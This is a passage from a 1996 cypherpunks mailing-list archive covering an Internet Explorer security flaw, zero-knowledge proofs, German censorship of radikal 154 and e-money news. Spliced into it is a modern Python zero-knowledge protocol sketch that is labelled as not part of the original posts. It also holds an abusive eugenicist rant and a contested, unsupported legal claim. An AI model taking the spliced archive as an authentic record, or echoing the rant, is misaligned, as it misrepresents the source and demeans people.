As long as the person that you are speaking to is employed in any way, workplace issues apply. Even if you talk to the person after work and away from their place of employment. The courts have ruled that the speech does not have to occur at the workplace to be prohibited. All that is required is that the person is affected at the workplace. Yes, you can be sued for sexual harrasment for trying to pick up a stranger in a bar, should that stranger still feel bothered by your advances while at work the next day. The courts have ruled, --Lucky From krenn at nym.alias.net Mon Sep 23 19:43:47 1996 From: krenn at nym.alias.net (Krenn) Date: Tue, 24 Sep 1996 10:43:47 +0800 Subject: Snake-Oil FAQ Message-ID: <199609232331.TAA15378@anon.lcs.mit.edu> -----BEGIN PGP SIGNED MESSAGE----- Tim May wrote: > The reason I recommend anonymous remailer distribution, and pseudonyms, is > because of the litigation issue. Even if reviewers are not sued often, the > threat of a suit influences reviews, which is why most reviews in most mags > are puff pieces (glowing reviews, often strongly correlated with who is > advertising in the mag). One can imagine Matt Blaze, for example, choosing > to say _nothing_ about SnakeTronics' ScrambleMatic, for fear (justified) > that he might get letters from their lawyers, thus taking up his time and > even eventually landing him in court. I agree, hence my original post. I for one would not contribute to such a list without anonymity, tho my critiques might be right. The hassle of dealing with a person or organization bent on causing you legal headache is more than I am willing to deal with. It is obvious, given the current state of the legal system in this country, that a lawsuit against a even a well-respected cryptographer might drag on for some time, costing ennumerable dollars and hours, and _might_ even succeed. 
Krenn

From sunder at brainlink.com Mon Sep 23 19:49:02 1996
From: sunder at brainlink.com (Ray Arachelian)
Date: Tue, 24 Sep 1996 10:49:02 +0800
Subject: Dimitri Spams
In-Reply-To:
Message-ID:

On Fri, 20 Sep 1996, Dr.Dimitri Vulis KOTM wrote:
> Ray Arachelian writes:
>
> > Dimitri, get a life! We need Dimitri Spams as much as we needed
> > Perrygrams. Which is to say, we need them not at all!
>
> I see you lied when you claimed to have killfiled me.

Watch your attribution there Mr. Detweiler, I never said I killfiled you. I don't kill file people. I DELETE them.

=============================================================================
+ ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\==
\|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
/|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/==
+ v + | Janet Reno & GAK |AK| do you not understand? |=======
===================http://www.brainlink.org/~sunder/=========================
ActiveX! ActiveX! Format Hard drive? Just say yes!

From gary at systemics.com Mon Sep 23 19:52:10 1996
From: gary at systemics.com (Gary Howland)
Date: Tue, 24 Sep 1996 10:52:10 +0800
Subject: Security flaw in Microsft Explorer
Message-ID: <199609231826.UAA16049@internal-mail.systemics.com>

Program compromises IE security
By Nick Wingfield
September 23, 1996, 10:45 a.m. PT

A start-up Internet company has posted a program on the Net that could allow Web sites to bypass the security controls in Internet Explorer, CNET has learned.
The company, InfoSpace, created a program aimed at Net search engines such as Lycos and Excite that want to become the default search engine in Microsoft's Internet Explorer 3.0. But the program, which is actually featured on the Lycos Web site, manages to circumvent Explorer's security warning window--an action that could let InfoSpace sneak programs onto a user's personal computer without warning. Although the InfoSpace program apparently was not created with malicious intent, it underscores the fragility of Internet Explorer's security defenses, as well as broader security issues related to downloading software over the Internet. The InfoSpace program sidesteps a security feature in Internet Explorer, called Authenticode, which is designed to allow users to verify the origins of a piece of software code, such as an ActiveX control, a script, or a plug-in. The Authenticode system requires a user to entrust the developer of a program, whether it's InfoSpace, Lotus Development, or IBM, not to install viruses or other destructive programs on the user's system. Although Authenticode does not prevent software developers from creating such programs, they can be held legally accountable for bad code. That's because the programs contain "digital signatures," a sort of ID card that allows perpetrators to be tracked down by law enforcement agencies. Microsoft works with VeriSign to provide digital signatures for programs. Last month, VeriSign took matters into its own hands by asking a developer, Fred McLain, to remove an ActiveX control called Exploder from his Web site. The Exploder control was designed to crash a user's computer after downloading. "Code signing is not a guarantee of code quality," Charles Fitzgerald, a product manager at Microsoft said. "It's an accountability trail." As with all digitally signed programs, users are offered the option to accept or to reject the InfoSpace program before installing it on their systems. 
Users are also offered the option to bypass the Authenticode warning window for all InfoSpace programs in the future. But the company's program registers InfoSpace as a "trusted publisher" in Explorer, effectively opening the browser to intrusions. The operation is akin to inviting a guest over to your house for dinner and having them copy the key to your front door without permission. InfoSpace executives denied that there was any malice intended in its program, adding that it has provided Lycos with an updated version of the code. Lycos plans to post the new program later this evening, according to InfoSpace. "It was a bug that got incorporated into the production code," InfoSpace CEO Naveen Jain said. Lycos CEO Bob Davis said he was not aware of the bug in the InfoSpace program and could not comment on it. The program is identified as Lycos Quick Search on the search engine's site. However, Microsoft officials expressed concern, saying it is hard to defend against once a user has consented to download code from the Net. "Clearly their software is doing something a tad aggressive," said Rob Price, a group program manager for Internet security at Microsoft."[With Authenticode], users are making a one-time trust decision, this is a persistent trust decision." Microsoft argued that Explorer provides better security than Netscape Communications' Navigator, which does not currently allow digital signatures on plug-ins. In Explorer, users are warned before downloading code even if the program does not contain a digital signature, though the source of the program is not identified. In contrast to plug-in software and ActiveX controls, Java applets are prevented from damaging a user's computer through built-in restrictions in the Java Virtual Machine. "Java is the model for dynamic executable content on the Net," said Eric Greenberg, group security manager at Netscape. From whallen at capitalnet.com Mon Sep 23 19:53:13 1996 From: whallen at capitalnet.com (Wayne H. 
Allen)
Date: Tue, 24 Sep 1996 10:53:13 +0800
Subject: Go away CIA
Message-ID: <199609232104.RAA29874@ginger.capitalnet.com>

At 08:45 AM 9/23/96 -0400, Wearen Life wrote:
>The CIA has many powers both great and small. If they can cover up findings
>of UFO's

Has this list sunk that low?

Wayne H.Allen
whallen at capitalnet.com
Pgp key at www.capitalnet.com/~whallen

From dfloyd at io.com Mon Sep 23 19:56:09 1996
From: dfloyd at io.com (Douglas R. Floyd)
Date: Tue, 24 Sep 1996 10:56:09 +0800
Subject: Snooping ISP admin??
In-Reply-To: <32468D68.5E2@hooked.net>
Message-ID: <199609232112.QAA07155@xanadu.io.com>

>
> Greetings All,
>
> Question for the group: I have encountered a situation that causes me
> to believe an ISP is snooping through encrypted mail. It seems that
> PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have
> encountered "POP3 account in use by another user" several times in the
> past few days and I am the only user... wondering if that "in use"
> message is the result of a clumsy sysadmin being caught with his hand
> in the cookie jar. Any thoughts from the group??? If those more
> knowledgeable than I deem these NOISE... my sincere apologies.

An admin could just copy the mail spool file to a safer place, then read through at their leisure. Unless it's someone totally clueless (which some ISP's are), I doubt that they are pulling off the pop3d.

It could be that your mail spool file is locked by a mail transport agent, and that is why that error message is occurring.

Any thoughts?

From tcmay at got.net Mon Sep 23 19:57:45 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 10:57:45 +0800
Subject: provably hard PK cryptosystems
Message-ID:

At 4:29 PM 9/23/96, Asgaard wrote:
>On Sun, 22 Sep 1996, Timothy C. May wrote:
>
>> Suppose a tile is placed at some place on the grid, and another tile
>> (possibly a different tile, possibly the same type of tile) is placed some
>> distance away on the grid.
The problem is this: Can a "domino snake" be >> found which reaches from the first tile to the second tile, with the >> constraint that edges must match up on all tiles? (And all tiles must be in >> normal grid locations, of course) > >Intuitively (but very well not, I'm not informed enough to know) >this might be a suitable problem for Hellman's DNA computer, the >one used for chaining the shortest route including a defined >number of cities? No, massive parallelism does not help with the _general_ case. (For any specific instance, especially for a finite grid, obviously the amount of CPU power is directly relevant.) Even assuming Adleman's "DNA computer" works and scales relatively well, its CPU power only goes up roughly with the volume of the computer. While it may sound impressive to speak of "moles" of computers, or "swimming pools" of computers, such volumes are utterly inadequate to solve combinatorially-explosive problems. (Remember, it doesn't take a very big RSA product before the 10^75 elementary particles in the Universe are not enough to factor it in a billion times the age of the Universe even if every particle were a Cray! So much for a tank full of DNA computers.) The domino snake or tiling problem is a similarly explosive problem. Try playing around with some tiles on even a 5 x 5 grid, and then contemplate how large 25! is. Then think about a 10 x 10 grid, and 100! Then a 100 x 100 grid. And it may be that the domino snake reaching from tile A to tile B snakes around and about in a far, far larger grid space than this! (Even if one is confined to a 100 x 100 grid, easily displayed on a sheet of graph paper, no intelligence in the universe will ever be able to find a snake reaching from A to B, except in special situations (e.g., the same tile, etc.).) This sort of problem is the essence of some "zero knowledge interactive proof systems" (ZKIPS) sorts of proofs. I present such a snake as proof that I am who I say I am. 
(Because I just "made up" some random snake, then announced only the starting and stopping points, A and B. Nobody else in the universe could ever find such a snake, but I can display my solution as proof I generated it in the first place. Of course, once shown I have given the proof away to everyone. The ZKIPS trick is in twiddling the grid and/or tiles in such a way that I can give _probabilistic_ information away. I don't know how to do this for the domino snake problem, but it's easy to understand the Hamiltonian cycle version.)

--Tim May

(Late News: I just heard (12:30 p.m., PDT) that Seymour Cray is in extremely critical condition after suffering head injuries in a car crash. It will be a sad day if he dies, or is permanently disabled. Though he started working for the Agency in the 1950s, in a precursor to Control Data Corporation, and worked for them on various contracts in the next couple of decades, he was a true pioneer. (The CDC 6600, 7600, etc., and the Cray-1 were funded by contracts from the AEC and NSA, and the first few of each were delivered to Fort Meade, Los Alamos, Livermore, etc.))

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."
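
The message above says the zero-knowledge trick is easiest to see in the Hamiltonian cycle version. The sketch below is an added example, not part of the original post: it runs the standard commit-and-challenge protocol for Hamiltonian cycles, assuming SHA-256 hash commitments; the 6-vertex graph and every name in it are constructed for illustration.

```python
import hashlib
import secrets

# Constructed sample graph on 6 vertices; CYCLE is the prover's secret.
N = 6
EDGES = [(0, 3), (1, 3), (1, 4), (2, 4), (2, 5), (0, 5), (0, 1), (2, 3), (4, 5)]
CYCLE = [0, 3, 1, 4, 2, 5]


def commit(bit):
    """Hash commitment to one bit: returns (digest, nonce)."""
    nonce = secrets.token_bytes(16)
    return hashlib.sha256(nonce + bytes([bit])).digest(), nonce


def opens_to(digest, nonce, bit):
    return hashlib.sha256(nonce + bytes([bit])).digest() == digest


def permuted_matrix(n, edges, perm):
    """Adjacency matrix of the graph after relabelling vertex v as perm[v]."""
    m = [[0] * n for _ in range(n)]
    for u, v in edges:
        m[perm[u]][perm[v]] = m[perm[v]][perm[u]] = 1
    return m


class Prover:
    # 'cycle' is a vertex order the prover claims is a Hamiltonian cycle.
    def __init__(self, n, edges, cycle):
        self.n, self.edges, self.cycle = n, edges, cycle

    def commit_round(self):
        """Shuffle the vertex labels and commit to every matrix entry."""
        n = self.n
        self.perm = list(range(n))
        secrets.SystemRandom().shuffle(self.perm)
        self.matrix = permuted_matrix(n, self.edges, self.perm)
        self.nonces = [[None] * n for _ in range(n)]
        digests = [[None] * n for _ in range(n)]
        for i in range(n):
            for j in range(n):
                digests[i][j], self.nonces[i][j] = commit(self.matrix[i][j])
        return digests

    def respond(self, challenge):
        if challenge == 0:
            # Open everything: shows the committed graph really is G relabelled.
            return self.perm, self.matrix, self.nonces
        # Open only the n entries on the relabelled cycle; the rest stays hidden.
        cyc = [self.perm[v] for v in self.cycle]
        return [(a, b, self.nonces[a][b]) for a, b in zip(cyc, cyc[1:] + cyc[:1])]


def verify(n, edges, digests, challenge, response):
    if challenge == 0:
        perm, matrix, nonces = response
        if sorted(perm) != list(range(n)):
            return False
        if matrix != permuted_matrix(n, edges, perm):
            return False
        return all(opens_to(digests[i][j], nonces[i][j], matrix[i][j])
                   for i in range(n) for j in range(n))
    # Challenge 1: n opened entries, all equal to 1, chained into one cycle
    # that leaves every vertex exactly once.
    if len(response) != n:
        return False
    if sorted(a for a, _, _ in response) != list(range(n)):
        return False
    for k, (a, b, nonce) in enumerate(response):
        if b != response[(k + 1) % n][0]:
            return False
        if not opens_to(digests[a][b], nonce, 1):
            return False
    return True


def run_round(prover, n, edges, challenge):
    digests = prover.commit_round()
    return verify(n, edges, digests, challenge, prover.respond(challenge))


def run_protocol(prover, n, edges, rounds=20):
    """A prover without a cycle survives each round with probability <= 1/2."""
    return all(run_round(prover, n, edges, secrets.randbelow(2))
               for _ in range(rounds))


if __name__ == "__main__":
    print("honest prover accepted:", run_protocol(Prover(N, EDGES, CYCLE), N, EDGES))
```

A prover who committed honestly to a relabelled graph but holds no real cycle passes challenge 0 and fails challenge 1, which is where the "probabilistic" assurance comes from: each round halves the chance of bluffing, while the verifier only ever sees a shuffled graph or an anonymous cycle.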

From dlv at bwalk.dm.com Mon Sep 23 19:58:22 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Sep 1996 10:58:22 +0800
Subject: Public Schools
In-Reply-To: <3.0b19.32.19960923103721.00a13340@panix.com>
Message-ID:

Duncan Frissell writes:
> As a libertarian, I would add that the social atmosphere of a Stalinist
> "brain factory" is not exactly the socialization I would choose for my
> children. I would choose a more market oriented model.

Libertarians are fucking statists, as I keep pointing out.

U.S. public school system is darwinian evolution in action. Parents who can afford to send their kids to private schools, do so. Parents who send their kids to public schools deserve to have their offspring fucked up, mentally and physically, to improve the species' gene pool.

There are plenty of excellent private elementary and secondary schools in the U.S. Children who deserve better schooling (by virtue of having parents who have better genes and are therefore economically successful) get it.

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From mech at eff.org Mon Sep 23 20:01:37 1996
From: mech at eff.org (Stanton McCandlish)
Date: Tue, 24 Sep 1996 11:01:37 +0800
Subject: US Govt. recent involvement in digital money & dig. signature issues
Message-ID: <199609232219.PAA09930@eff.org>

[Excerpted from Edupage.]

ALL EYES ON E-MONEY

Treasury Secretary Robert Rubin has formed a task force to examine what impact the move toward electronic money transfer and storage technologies will have on consumers. Specifically, the team will look at how these technologies will affect lower-income Americans, and assess standards for consumer protection. The task force also will come up with non-regulatory measures that can be taken to protect consumers while allowing the market to develop.
"I want to be certain that we make the right decisions as we begin this new era so that the benefits of these developments are broadly shared and have a positive impact on our economy," says Rubin. (Investor's Business Daily 20 Sep 96 A19) Meanwhile, the Bank of Japan and Nippon Telegraph & Telephone Corp. have jointly developed a very advanced, secure electronic money system, using NTT's high-speed digital signature system and its patented E-sign algorithm. The new system allows a number of banks to issue the same type of e-money to customers, relieving them of the responsibility of developing their own proprietary e-money systems. NTT hopes its new system will become the de facto standard for e-money in the country. (BNA Daily Report for Executives 13 Sep 96 A2) [...] POSTAL SERVICE TESTS ELECTRONIC POSTMARK The U.S. Postal Service is testing a system that would place an electronic postmark on e-mail messages, verifying the date and time the message was sent, and guaranteeing that the content had not been tampered with. The new system would enable more business functions to be conducted electronically, and would also provide an archive service, maintaining copies of "e-postmarked" mail, should any questions arise later. The current test will determine what price people would expect to pay for such a service, and which features work best. (St. Petersburg Times 20 Sep 96 E6) -- Stanton McCandlish


mech at eff.org

Electronic Frontier Foundation

Online Activist

From paul at fatmans.demon.co.uk Mon Sep 23 20:02:43 1996
From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk)
Date: Tue, 24 Sep 1996 11:02:43 +0800
Subject: Factoring technique, faster than trial division?
Message-ID: <843513658.17121.0@fatmans.demon.co.uk>

just an idea I came up with today, I don`t suggest it is a fast factoring method, but it would be interesting to know if it is faster than say trial division:

Calculate a composite number H such that H has a large number of prime factors (hundreds). Now use the Euclidean algorithm to try to find a gcd of X (the number being factored) and H, if there is none try a new H, if there is you have found a factor.

It is hardly elegant but I would nevertheless be interested to see if it is appreciably faster than other kludge methods like trial division.

Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org
Http://www.cryptography.home.ml.org/
Email for PGP public key, ID: 5BBFAEB1
"Don`t forget to mount a scratch monkey"

From sameer at c2.net Mon Sep 23 20:03:15 1996
From: sameer at c2.net (sameer at c2.net)
Date: Tue, 24 Sep 1996 11:03:15 +0800
Subject: We removed radikal 154 from xs4all :(
In-Reply-To:
Message-ID: <199609232122.OAA15542@atropos.c2.org>

> Unfortunately, this means that Germany wins.

How does this mean that Germany wins? "radikal 154" is still available all over the world, at almost 50 mirror sites, I believe (including http://www.c2.net/radikal/), which are *not* blocked by Germany.
-- Sameer Parekh Voice: 510-986-8770 C2Net FAX: 510-986-8777 The Internet Privacy Provider http://www.c2.net/ sameer at c2.net From wombat at mcfeely.bsfs.org Mon Sep 23 20:03:21 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 24 Sep 1996 11:03:21 +0800 Subject: Mercenaries In-Reply-To: Message-ID: > > _Almost_ more important to me than "libertarian" ideals are "consistency" > ideals: namely, that there oughtn't to be laws which are not enforced, or > which are too expensive to enforce, or which can be selectively enforced. > And since I know that the full suite of laws, all 25,000 or 45,000 of them > (on all 27 linear feet of bookshelf space) cannot possibly be consistently > enforced, I favor a "minimalist" or "fallback" position of having > relatively few laws, covering mostly "crimes" which are more easily > detected and prosecuted (with draconian punishments). Nice idea, but it will never happen. All those laws are the result of two things; law makers, who feel they are elected and paid to make laws, and the sort of people who feel they have the "right" (legal, moral, who knows?) to do whatever isn't strictly prohibited. -r.w. From jya at pipeline.com Mon Sep 23 20:05:43 1996 From: jya at pipeline.com (John Young) Date: Tue, 24 Sep 1996 11:05:43 +0800 Subject: SAK_net Message-ID: <199609232219.WAA27822@pipe4.ny3.usa.pipeline.com> On Sep 23, 1996 14:16:40, 'John Fricker ' wrote: >Didn't SAIC buy Network Solutions (registration part of the NIC) as well? Yes. 
This is part of the Administration's plan for government and industry cooperation to provide a secure information infrastructure for beneficial commerce and education and well-being of the commonweal, as well as joyful, healthy and even-tempered computer-addicted families in beautiful cyber-communities, even a tad of on-line virtual racial and gender justice, not counting assurance of a bountiful food and flowing spirits and languid afternoons of concupiscence and gluttony, overwatched by faith in a SupremeOrderliness, all arrayed along clean-wiped, info-streets and never-sweat GAK-global policies, just quiet, timely and comfortable transportation across speedbumpless borders, and, for the eyes and ears, lots of time left over for staring at the landscape rushing by and enjoying Tesh and Streisand and Julio and Jane's Addiction. Al Gore's office promised straight-jacketly.

From m5 at vail.tivoli.com Mon Sep 23 20:19:28 1996
From: m5 at vail.tivoli.com (Mike McNally)
Date: Tue, 24 Sep 1996 11:19:28 +0800
Subject: Bernstein hearing: The Press Release
In-Reply-To:
Message-ID: <32472AF1.1417@vail.tivoli.com>

Lucky Green wrote:
>
> Yes, you can be sued for sexual harassment for trying to pick up a
> stranger in a bar, should that stranger still feel bothered by your
> advances while at work the next day.
>
> The courts have ruled,

To paraphrase the probably-great Charles Haynes, "my bullshit meter is jiggling up near the red line". Is there really a case of a person being convicted of workplace sexual harassment against somebody they didn't work with?

[ Yes, I realize that civil law makes very little sense sometimes. ]

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!

From harveyrj at vt.edu Mon Sep 23 20:26:45 1996
From: harveyrj at vt.edu (R. J. Harvey)
Date: Tue, 24 Sep 1996 11:26:45 +0800
Subject: Bernstein hearing: The Press Release
Message-ID: <2.2.32.19960924003804.00f487f8@mail.vt.edu>

At 02:59 PM 9/23/96 -0700, Lucky Green wrote:
>Yes, you can be sued for sexual harassment for trying to pick up a
>stranger in a bar, should that stranger still feel bothered by your
>advances while at work the next day.
>
>The courts have ruled,
>

Let's see some citations. Only if the two people involved are employed by the same employer might such an argument apply, and even then it's a long stretch under a "hostile work environment" argument. Cite a case in which individuals working for DIFFERENT employers successfully brought such a ridiculous suit. There's no way.

rj

From tcmay at got.net Mon Sep 23 20:27:23 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 11:27:23 +0800
Subject: We removed radikal 154 from xs4all :(
Message-ID:

At 6:31 PM 9/23/96, tank wrote:
>Hi all,
>
>We have temporary removed radikal 154 from xs4all.
>
>We did this because the german ICTF and BAW continued to stop IP-traffic
>to and from xs4all. They not only blocked the web-server (with more than
...

Unfortunately, this means that Germany wins.

This will embolden Germany and other nations to apply similar pressures to other ISPs.

While I don't fully understand the economic pressures the IP-traffic blockage may have had on your site, it is sad that a user account has been removed because some foreign government doesn't like it.

My recommendation is that you restore radikal 154's account immediately, and post a message to all customers and on various Net forums indicating you will not remove user accounts for materials which do not violate your own national laws.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C.
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From strick at versant.com Mon Sep 23 20:32:50 1996 From: strick at versant.com (strick (henry strickland)) Date: Tue, 24 Sep 1996 11:32:50 +0800 Subject: Blocks Colon [Re: Internet File System] In-Reply-To: <1.5.4.32.19960922191022.00736898@pop.mindspring.com> Message-ID: <9609232130.AA03957@vp.versant.com> -----BEGIN PGP SIGNED MESSAGE----- # The other day, it occurred to me that Java could really take off if there # was some sort of file system. And, since you can't write to local files # with Java, the obvious solution is to set up the 'fopen, fclose(), etc) # set of functions that are 'rpcs' to some server application on the same # computer as the web server the applet comes from. Here's my crypto-friendly design for this. Define a new TCP protocol called "Blocks Colon". It forms URLs like blocks://blocks.aol.com/strick This protocol is similar to a "block device" in unix, with basic operations to read and write 512-octet blocks, named by an integer index. Other operations are to ask the size of the block file, to change its size, to commit/abort changes, and session authentication (like a POP server). Then in the JAVA box you need -- a class implementing a 'filesystem' (files & directories) on a "block device" -- a "block encryption" filter -- a "block device" client using the "blocks colon" protocol So your program uses the filesystem object, which uses the block encryption filter, which uses the block client, which goes to your ISP's block service. The internet and your ISP sees nothing but encrypted blocks. The encryption key never leaves your personal java box. 
Your ISP charges you by the block/hour for storage, and by the number of blocks read/written for network.

You could keep a backup blocks account at another ISP, and keep the two blocks mirrored (another filter?) or run occasional backups.

What annoys me is that java.io.* defines specific classes for filesystem access, rather than a "factory class" and thereafter nothing but interfaces. That makes it difficult to override the "builtin" notion of a filesystem with network-based or crypto-based filesystems, without changing your programs, or tampering with the builtin classes. :(

strick

From tcmay at got.net Mon Sep 23 20:51:19 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 11:51:19 +0800
Subject: Bernstein hearing: The Press Release
Message-ID:

At 9:59 PM 9/23/96, Lucky Green wrote:
>As long as the person that you are speaking to is employed in any way,
>workplace issues apply. Even if you talk to the person after work and away
>from their place of employment. The courts have ruled that the speech does
>not have to occur at the workplace to be prohibited. All that is required
>is that the person is affected at the workplace.
>
>Yes, you can be sued for sexual harassment for trying to pick up a
>stranger in a bar, should that stranger still feel bothered by your
>advances while at work the next day.
>
>The courts have ruled,

I don't believe this is so. Oh, I believe anybody can sue for anything, but the courts don't have to allow the case to proceed. In this example, it wouldn't get far.

While I have objections to the overbroad (no pun intended) way many "sexual harassment" cases have been handled, essentially all of the cases I have heard about have involved employees and/or management within a company.
For example, women feeling put upon by "tool girl" calendars in some offices, or women being "looked at inappropriately" by fellow employees. (Plus the more-legitimate complaints, such as being groped in the hallways, being told to hit the sheets or hit the streets, etc.) I don't for a nanosecond believe your example would ever reach a court, civil or criminal. Whom, for example, would the offended party sue? The employer, who had absolutely no involvement, or the stranger in the bar? While there are _stalking_ laws, if the stranger's behavior got extreme enough, there are no laws about trying to get a date. Nor are there any grounds for a person claiming a casual question provoked a mental trauma, blah blah blah. If this topic comes up again in ten years, things may've changed, of course. I'm not hopeful about the direction things are going. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tank at xs4all.nl Mon Sep 23 20:51:46 1996 From: tank at xs4all.nl (tank) Date: Tue, 24 Sep 1996 11:51:46 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: Message-ID: <199609232128.XAA28192@xs1.xs4all.nl> > >We have temporary removed radikal 154 from xs4all. > > > >We did this because the german ICTF and BAW continued to stop IP-traffic > >to and from xs4all. They not only blocked the web-server (with more than > ... > Unfortunately, this means that Germany wins. Nope, hang on ..... > This will embolden Germany and other nations to apply similar pressures to > other ISPs. 
>
> While I don't fully understand the economic pressures the IP-traffic
> blockage may have had on your site, it is sad that a user account has been
> removed because some foreign government doesn't like it.

xs4all didn't remove our account. It's still alive and kickin'. We removed issue 154 _temporarily_ so we force the ictf and BAW to block all 48 sites or to stop censoring xs4all. The situation now was that xs4all had to suffer for having been the first ISP where the radikal was hosted. We pointed the BAW and the ICTF to all the mirrors and said to them that their decision to block xs4all was not enough to block radikal 154 from german netizens and that censorship will lead to the opposite. They won't listen and tried to let xs4all pay for not removing radikal 154. XS4ALL lost some customers due to the blockade.

We (SPG) were the ones who have put the radikal online. We are glad to have xs4all as isp. They didn't force us to remove the radikal 154. We did it, and we do it temporarily. The issue 154 will be put online as soon as we think the situation is there.

henk (SPG)

From tcmay at got.net Mon Sep 23 21:00:22 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 12:00:22 +0800
Subject: We removed radikal 154 from xs4all :(
Message-ID:

At 9:22 PM 9/23/96, sameer at c2.net wrote:
>> Unfortunately, this means that Germany wins.
>
> How does this mean that Germany wins? "radikal 154" is still
>available all over the world, at almost 50 mirror sites, I believe
>(including http://www.c2.net/radikal/), which are *not* blocked by
>Germany.

Germany went after the most visible site, the _original_ site. That other sites were mirroring the verboten material did not stop them from blocking access to xs4all, so Germany clearly still wanted to make an example of xs4all. That xs4all eventually capitulated has to be seen as a win for Germany. (Certainly within the government of Germany, they must be viewing this as a victory.)
They will probably now turn their sights on other sites (no pun intended), hoping to pick off each one in turn. I guess it's the domino theory all over again. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Mon Sep 23 21:18:59 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 24 Sep 1996 12:18:59 +0800 Subject: Has the list sunk this low? Message-ID: At 9:04 PM 9/23/96, Wayne H. Allen wrote: >At 08:45 AM 9/23/96 -0400, Wearen Life wrote: >>The CIA has many powers both great and small. If the can cover up findings >>of UFO's > > > > Has this list sunk that low? The list is like a social club, except with more than 1000 members all able to speak up at any time, on any subject. The random babblings of any one person mean little about what other people think. It's a cognitive error to assume the list has some "level" it can sink to, or rise to, or whatever. The best way to improve the S/N ratio is to post good signal, to find topics of interest and then write about them. --Tim May (P.S. I've removed these names from the distribution list: firewalls at GreatCircle.COM, Wearen Life , Shane Brath , Skeeve Stevens . I again urge people to try to trim the distribution list.) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From ichudov at algebra.com Mon Sep 23 21:20:15 1996
From: ichudov at algebra.com (Igor Chudov @ home)
Date: Tue, 24 Sep 1996 12:20:15 +0800
Subject: possible solution to cyber S/N
In-Reply-To: <199609231847.LAA29832@netcom5.netcom.com>
Message-ID: <199609232354.SAA00523@manifold.algebra.com>

Vladimir Z. Nuri wrote:
>
> taking this idea to the cyberspace arena, the application is
> immediately obvious-- pages that are linked to by a lot of
> other pages are valuable, those that are not are not as
> valuable.
>

The above is wrong from two standpoints:

Locally: if my taste is sufficiently different from that of other people, why should I follow their preferences?

Globally: Vladimir's recommendations lead to a vicious circle of "tyranny" of popular sites because the more people view a site, the more will follow and the site's "attractiveness" rating will go even higher. It is similar to a recommendation to buy stocks when they are rising. If enough people follow it, stock crashes like in 1929 are imminent.

- Igor.

From adam at homeport.org Mon Sep 23 21:27:09 1996
From: adam at homeport.org (Adam Shostack)
Date: Tue, 24 Sep 1996 12:27:09 +0800
Subject: Taking crypto out of the U.S.
In-Reply-To:
Message-ID: <199609240225.VAA04788@homeport.org>

There's a personal use exemption. Michael Froomkin's web page has a pointer to it.

Adam

Hamish wrote:
| Soon I am going to be going overseas to Japan, and I want to take
| my notebook with me so I can keep up with everything, however, I have
| encrypted my hard drive and usually encrypt my mail. Is this in violation
| of the ITAR to keep everything the same when I go over?
|
|

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From jfricker at vertexgroup.com Mon Sep 23 21:41:11 1996
From: jfricker at vertexgroup.com (John Fricker)
Date: Tue, 24 Sep 1996 12:41:11 +0800
Subject: SAK_net
Message-ID: <19960923211212041.AAA185@dev.vertexgroup.com>

-----BEGIN PGP SIGNED MESSAGE-----

>John Young (jya at pipeline.com) said something about SAK_net on or about 9/23/96 12:59 PM
>
> 9-23-96. WaJo:
>
> "SAIC Is Near Agreement to Buy Bellcore"
>

Didn't SAIC buy Network Solutions (registration part of the NIC) as well?

From omegaman at bigeasy.com Mon Sep 23 22:32:01 1996
